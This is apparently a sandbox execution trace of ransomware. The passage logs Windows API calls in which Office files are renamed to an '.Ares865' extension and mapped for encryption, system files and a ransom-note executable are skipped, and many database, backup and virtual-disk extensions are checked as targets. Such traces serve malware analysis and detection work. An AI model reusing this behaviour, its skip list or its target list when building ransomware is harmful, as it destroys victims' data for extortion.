MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c0) returned 0x190000 [0064.932] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.933] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.933] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.933] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.933] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml.Ares865") returned 84 [0064.933] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessdata.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessdata.xml.ares865"), dwFlags=0x1) returned 1 [0064.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessdata.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.934] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=210743) returned 1 [0064.934] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0064.934] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.935] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.935] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0064.935] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.935] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.936] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33a40, lpName=0x0) returned 0x154 [0064.937] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33a40) returned 0x420000 [0064.946] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.946] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.946] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.946] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.950] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.Ares865") returned 98 [0064.950] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.semitrust.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.semitrust.xml.ares865"), dwFlags=0x1) returned 1 [0064.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.semitrust.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0064.951] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=807525) returned 1 [0064.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0064.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0064.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.951] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0064.952] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.952] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.953] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc5570, lpName=0x0) returned 0x154 [0064.954] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc5570) returned 0x2ad0000 [0064.987] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0064.987] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.987] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0064.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0064.998] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml.Ares865") returned 92 [0064.998] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.xml.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.xml.xml.ares865"), dwFlags=0x1) returned 1 [0065.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.xml.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0065.009] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=538583) returned 1 [0065.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0065.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0065.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0065.072] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0065.073] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0065.073] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.075] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x83ae0, lpName=0x0) returned 0x154 [0065.093] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x83ae0) returned 0x420000 [0065.114] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0065.115] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0065.115] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.122] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x102e00, ftCreationTime.dwHighDateTime=0x1cab7e3, ftLastAccessTime.dwLowDateTime=0x853ab920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x102e00, ftLastWriteTime.dwHighDateTime=0x1cab7e3, nFileSizeHigh=0x0, nFileSizeLow=0x12798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cAlternateFileName="MIAE71~1.DLL")) returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="aoldtz.exe") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="..") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="windows") returned -1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="bootmgr") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="temp") returned -1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="pagefile.sys") returned -1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="boot") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="ids.txt") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="ntuser.dat") returned -1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="perflogs") returned -1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="MSBuild") returned -1 [0065.123] lstrlenW (lpString="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll") returned 52 [0065.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml") returned 84 [0065.123] lstrcmpiW (lpString1="ing.dll", lpString2="Ares865") returned 1 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".dll") returned 1 [0065.123] lstrlenW (lpString=".lnk") returned 4 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".lnk") returned 1 [0065.123] lstrlenW (lpString=".ini") returned 4 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".ini") returned 1 [0065.123] lstrlenW (lpString=".sys") returned 4 [0065.123] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".sys") returned 1 [0065.123] lstrlenW (lpString="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll") returned 52 [0065.123] lstrlenW (lpString="bak") returned 3 [0065.123] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0065.123] lstrlenW (lpString="ba_") returned 3 [0065.123] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0065.123] lstrlenW (lpString="dbb") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0065.124] lstrlenW (lpString="vmdk") returned 4 [0065.124] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0065.124] lstrlenW (lpString="rar") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0065.124] lstrlenW (lpString="zip") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0065.124] lstrlenW (lpString="tgz") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0065.124] lstrlenW (lpString="vbox") returned 4 [0065.124] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0065.124] lstrlenW (lpString="vdi") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0065.124] lstrlenW (lpString="vhd") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0065.124] lstrlenW (lpString="vhdx") returned 4 [0065.124] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0065.124] lstrlenW (lpString="avhd") returned 4 [0065.124] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0065.124] lstrlenW (lpString="db") returned 2 [0065.124] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0065.124] lstrlenW (lpString="db2") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0065.124] lstrlenW (lpString="db3") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0065.124] lstrlenW (lpString="dbf") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0065.124] lstrlenW (lpString="mdf") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0065.124] lstrlenW (lpString="mdb") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0065.124] lstrlenW (lpString="sql") returned 3 [0065.124] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0065.124] lstrlenW (lpString="sqlite") returned 6 [0065.124] lstrcmpiW (lpString1="ng.dll", lpString2="sqlite") returned -1 [0065.124] lstrlenW (lpString="sqlite3") returned 7 [0065.125] lstrcmpiW (lpString1="ing.dll", lpString2="sqlite3") returned -1 [0065.125] lstrlenW (lpString="sqlitedb") returned 8 [0065.125] lstrcmpiW (lpString1="ring.dll", lpString2="sqlitedb") returned -1 [0065.125] lstrlenW (lpString="xml") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0065.125] lstrlenW (lpString="$er") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0065.125] lstrlenW (lpString="4dd") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0065.125] lstrlenW (lpString="4dl") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0065.125] lstrlenW (lpString="^^^") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0065.125] lstrlenW (lpString="abs") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0065.125] lstrlenW (lpString="abx") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0065.125] lstrlenW (lpString="accdb") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accdb") returned 1 [0065.125] lstrlenW (lpString="accdc") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accdc") returned 1 [0065.125] lstrlenW (lpString="accde") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accde") returned 1 [0065.125] lstrlenW (lpString="accdr") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accdr") returned 1 [0065.125] lstrlenW (lpString="accdt") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accdt") returned 1 [0065.125] lstrlenW (lpString="accdw") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accdw") returned 1 [0065.125] lstrlenW (lpString="accft") returned 5 [0065.125] lstrcmpiW (lpString1="g.dll", lpString2="accft") returned 1 [0065.125] lstrlenW (lpString="adb") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0065.125] lstrlenW (lpString="adb") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0065.125] lstrlenW (lpString="ade") returned 3 [0065.125] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0065.126] lstrlenW (lpString="adf") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0065.126] lstrlenW (lpString="adn") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0065.126] lstrlenW (lpString="adp") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0065.126] lstrlenW (lpString="alf") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0065.126] lstrlenW (lpString="ask") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0065.126] lstrlenW (lpString="btr") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0065.126] lstrlenW (lpString="cat") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0065.126] lstrlenW (lpString="cdb") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0065.126] lstrlenW (lpString="ckp") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0065.126] lstrlenW (lpString="cma") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0065.126] lstrlenW (lpString="cpd") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0065.126] lstrlenW (lpString="dacpac") returned 6 [0065.126] lstrcmpiW (lpString1="ng.dll", lpString2="dacpac") returned 1 [0065.126] lstrlenW (lpString="dad") returned 3 [0065.126] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0065.126] lstrlenW (lpString="dadiagrams") returned 10 [0065.126] lstrcmpiW (lpString1="horing.dll", lpString2="dadiagrams") returned 1 [0065.126] lstrlenW (lpString="daschema") returned 8 [0065.126] lstrcmpiW (lpString1="ring.dll", lpString2="daschema") returned 1 [0065.126] lstrlenW (lpString="db-journal") returned 10 [0065.126] lstrcmpiW (lpString1="horing.dll", lpString2="db-journal") returned 1 [0065.126] lstrlenW (lpString="db-shm") returned 6 [0065.126] lstrcmpiW (lpString1="ng.dll", lpString2="db-shm") returned 1 [0065.126] lstrlenW (lpString="db-wal") returned 6 [0065.126] lstrcmpiW (lpString1="ng.dll", lpString2="db-wal") returned 1 [0065.126] lstrlenW (lpString="dbc") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0065.127] lstrlenW (lpString="dbs") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0065.127] lstrlenW (lpString="dbt") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0065.127] lstrlenW (lpString="dbv") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0065.127] lstrlenW (lpString="dbx") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0065.127] lstrlenW (lpString="dcb") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0065.127] lstrlenW (lpString="dct") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0065.127] lstrlenW (lpString="dcx") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0065.127] lstrlenW (lpString="ddl") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0065.127] lstrlenW (lpString="dlis") returned 4 [0065.127] lstrcmpiW (lpString1=".dll", lpString2="dlis") returned -1 [0065.127] lstrlenW (lpString="dp1") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0065.127] lstrlenW (lpString="dqy") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0065.127] lstrlenW (lpString="dsk") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0065.127] lstrlenW (lpString="dsn") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0065.127] lstrlenW (lpString="dtsx") returned 4 [0065.127] lstrcmpiW (lpString1=".dll", lpString2="dtsx") returned -1 [0065.127] lstrlenW (lpString="dxl") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0065.127] lstrlenW (lpString="eco") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0065.127] lstrlenW (lpString="ecx") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0065.127] lstrlenW (lpString="edb") returned 3 [0065.127] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0065.127] lstrlenW (lpString="epim") returned 4 [0065.128] lstrcmpiW (lpString1=".dll", lpString2="epim") returned -1 [0065.128] lstrlenW (lpString="fcd") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0065.128] lstrlenW (lpString="fdb") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0065.128] lstrlenW (lpString="fic") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0065.128] lstrlenW (lpString="flexolibrary") returned 12 [0065.128] lstrcmpiW (lpString1="uthoring.dll", lpString2="flexolibrary") returned 1 [0065.128] lstrlenW (lpString="fm5") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0065.128] lstrlenW (lpString="fmp") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0065.128] lstrlenW (lpString="fmp12") returned 5 [0065.128] lstrcmpiW (lpString1="g.dll", lpString2="fmp12") returned 1 [0065.128] lstrlenW (lpString="fmpsl") returned 5 [0065.128] lstrcmpiW (lpString1="g.dll", lpString2="fmpsl") returned 1 [0065.128] lstrlenW (lpString="fol") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0065.128] lstrlenW (lpString="fp3") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0065.128] lstrlenW (lpString="fp4") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0065.128] lstrlenW (lpString="fp5") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0065.128] lstrlenW (lpString="fp7") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0065.128] lstrlenW (lpString="fpt") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0065.128] lstrlenW (lpString="frm") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0065.128] lstrlenW (lpString="gdb") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0065.128] lstrlenW (lpString="gdb") returned 3 [0065.128] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0065.128] lstrlenW (lpString="grdb") returned 4 [0065.128] lstrcmpiW (lpString1=".dll", lpString2="grdb") returned -1 [0065.129] lstrlenW (lpString="gwi") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0065.129] lstrlenW (lpString="hdb") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0065.129] lstrlenW (lpString="his") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0065.129] lstrlenW (lpString="ib") returned 2 [0065.129] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0065.129] lstrlenW (lpString="idb") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0065.129] lstrlenW (lpString="ihx") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0065.129] lstrlenW (lpString="itdb") returned 4 [0065.129] lstrcmpiW (lpString1=".dll", lpString2="itdb") returned -1 [0065.129] lstrlenW (lpString="itw") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0065.129] lstrlenW (lpString="jet") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0065.129] lstrlenW (lpString="jtx") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0065.129] lstrlenW (lpString="kdb") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0065.129] lstrlenW (lpString="kexi") returned 4 [0065.129] lstrcmpiW (lpString1=".dll", lpString2="kexi") returned -1 [0065.129] lstrlenW (lpString="kexic") returned 5 [0065.129] lstrcmpiW (lpString1="g.dll", lpString2="kexic") returned -1 [0065.129] lstrlenW (lpString="kexis") returned 5 [0065.129] lstrcmpiW (lpString1="g.dll", lpString2="kexis") returned -1 [0065.129] lstrlenW (lpString="lgc") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0065.129] lstrlenW (lpString="lwx") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0065.129] lstrlenW (lpString="maf") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0065.129] lstrlenW (lpString="maq") returned 3 [0065.129] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0065.129] lstrlenW (lpString="mar") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0065.130] lstrlenW (lpString="marshal") returned 7 [0065.130] lstrcmpiW (lpString1="ing.dll", lpString2="marshal") returned -1 [0065.130] lstrlenW (lpString="mas") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0065.130] lstrlenW (lpString="mav") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0065.130] lstrlenW (lpString="maw") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0065.130] lstrlenW (lpString="mdbhtml") returned 7 [0065.130] lstrcmpiW (lpString1="ing.dll", lpString2="mdbhtml") returned -1 [0065.130] lstrlenW (lpString="mdn") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0065.130] lstrlenW (lpString="mdt") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0065.130] lstrlenW (lpString="mfd") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0065.130] lstrlenW (lpString="mpd") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0065.130] lstrlenW (lpString="mrg") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0065.130] lstrlenW (lpString="mud") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0065.130] lstrlenW (lpString="mwb") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0065.130] lstrlenW (lpString="myd") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0065.130] lstrlenW (lpString="ndf") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0065.130] lstrlenW (lpString="nnt") returned 3 [0065.130] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0065.130] lstrlenW (lpString="nrmlib") returned 6 [0065.130] lstrcmpiW (lpString1="ng.dll", 